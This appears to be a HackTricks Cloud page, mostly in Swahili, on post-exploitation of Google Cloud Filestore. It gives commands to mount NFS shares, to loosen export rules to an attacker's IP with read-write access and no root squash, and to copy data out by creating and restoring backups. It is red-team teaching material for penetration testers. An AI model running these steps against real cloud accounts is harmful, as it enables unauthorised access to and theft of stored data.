GCP - Filestore Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

Kwa maelezo zaidi kuhusu Filestore angalia:

GCP - Filestore Enum

Mount Filestore

Mfumo wa faili wa pamoja unaweza kuwa na taarifa nyeti zinazovutia kutoka kwa mtazamo wa washambuliaji. Kwa kupata ufikiaji wa Filestore inawezekana kuunganisha:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Ili kupata anwani ya IP ya filestore instance angalia sehemu ya orodha ya ukurasa:

GCP - Filestore Enum

Ondoa Vikwazo na pata ruhusa za ziada

Ikiwa mshambuliaji hayuko katika anwani ya IP yenye ufikiaji wa sehemu hiyo, lakini una ruhusa za kutosha kubadilisha, inawezekana kuondoa vikwazo au ufikiaji juu yake. Pia inawezekana kutoa mamlaka zaidi juu ya anwani yako ya IP ili kuwa na ufikiaji wa admin juu ya sehemu hiyo:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Restore a backup

Ikiwa kuna nakala ya akiba, inawezekana kuirejesha katika mfano uliopo au katika mfano mpya ili habari zake zipatikane:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Create a backup and restore it

Ikiwa huna ufikiaji wa sehemu na hutaki kuibadilisha, inawezekana kuunda nakala ya akiba yake na kuirejesha kama ilivyotajwa hapo awali:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 8 days ago